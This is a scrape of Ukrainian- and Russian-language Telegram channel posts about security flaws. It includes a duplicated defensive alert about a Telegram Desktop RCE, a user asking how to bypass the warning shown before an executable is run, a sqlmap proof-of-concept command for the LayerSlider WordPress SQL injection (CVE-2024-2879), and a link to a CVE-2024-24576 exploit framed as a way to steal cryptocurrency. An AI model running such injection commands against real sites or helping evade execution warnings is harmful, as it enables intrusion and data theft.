Forwarded from DC1488
УВАГА! Особливо військові!
У клієнтах Telegram Desktop виявлено вразливість для виконання довільного коду (так звана RCE вразливість) при обробці медіафайлів. Ця проблема наражає користувачів на ризик зловмисних атак через спеціально створені медіафайли, такі як зображення або відео.
З метою безпеки вимкніть функцію автоматичного завантаження медіа (фото, відео, файлів). Будь ласка, дотримуйтесь цих кроків:
Перейдіть в налаштування (Settings).
Натисніть "Розширені" (Advanced).
У розділі "Автоматичне завантаження медіа" (Automatic media download) негайно вимкніть автоматичне завантаження для "Фотографій", "Відео" та "Файлів" у всіх типах чатів (особисті чати, групи та канали). Всі повзунки мають бути в положенні вимкнено. Перезавантажте застосунок Телеграм Десктоп.
З цього моменту і до виходу відповідних оновлень Телеграму, яке виправляє вразливість, не переглядайте зайвого медіа-контенту (не завантажуйте його), особливо від незнайомих контактів.
Це не чутки: ми знаємось на кібербезпеці і знаємо, про що пишемо! Ще раз: мова лише про десктоп. Мобільних клієнтів Телеграм це не стосується.
У клієнтах Telegram Desktop виявлено вразливість для виконання довільного коду (так звана RCE вразливість) при обробці медіафайлів. Ця проблема наражає користувачів на ризик зловмисних атак через спеціально створені медіафайли, такі як зображення або відео.
З метою безпеки вимкніть функцію автоматичного завантаження медіа (фото, відео, файлів). Будь ласка, дотримуйтесь цих кроків:
Перейдіть в налаштування (Settings).
Натисніть "Розширені" (Advanced).
У розділі "Автоматичне завантаження медіа" (Automatic media download) негайно вимкніть автоматичне завантаження для "Фотографій", "Відео" та "Файлів" у всіх типах чатів (особисті чати, групи та канали). Всі повзунки мають бути в положенні вимкнено. Перезавантажте застосунок Телеграм Десктоп.
З цього моменту і до виходу відповідних оновлень Телеграму, яке виправляє вразливість, не переглядайте зайвого медіа-контенту (не завантажуйте його), особливо від незнайомих контактів.
Це не чутки: ми знаємось на кібербезпеці і знаємо, про що пишемо! Ще раз: мова лише про десктоп. Мобільних клієнтів Телеграм це не стосується.
👍4
Family RIN
Верим в рце?
Кстати она есть, добрые люди скинули посмотреть
Family RIN
Video
Может кто знает как обойти предупреждение о запуске выполняемого файла
Forwarded from TON POINTER (KRAIT⚡)
Forwarded from Proxy Bar
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
#wordpress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
Догадки мои или нет, но опенаи начинает или постепенно запускает интернет к чатгпт
Forwarded from Clown security
Малюткам на растерах, аля самом безопасном языке погроммирования, стоит напрячь свои пердачки и запастись вазелином. Ведь используя данную уязвимость можно захватить контроль над пк и выкачать все биткоины или тончики.
PoC
https://github.com/aydinnyunus/CVE-2024-24576-Exploit
PoC
https://github.com/aydinnyunus/CVE-2024-24576-Exploit
GitHub
GitHub - aydinnyunus/CVE-2024-24576-Exploit: CVE-2024-24576 Proof of Concept
CVE-2024-24576 Proof of Concept. Contribute to aydinnyunus/CVE-2024-24576-Exploit development by creating an account on GitHub.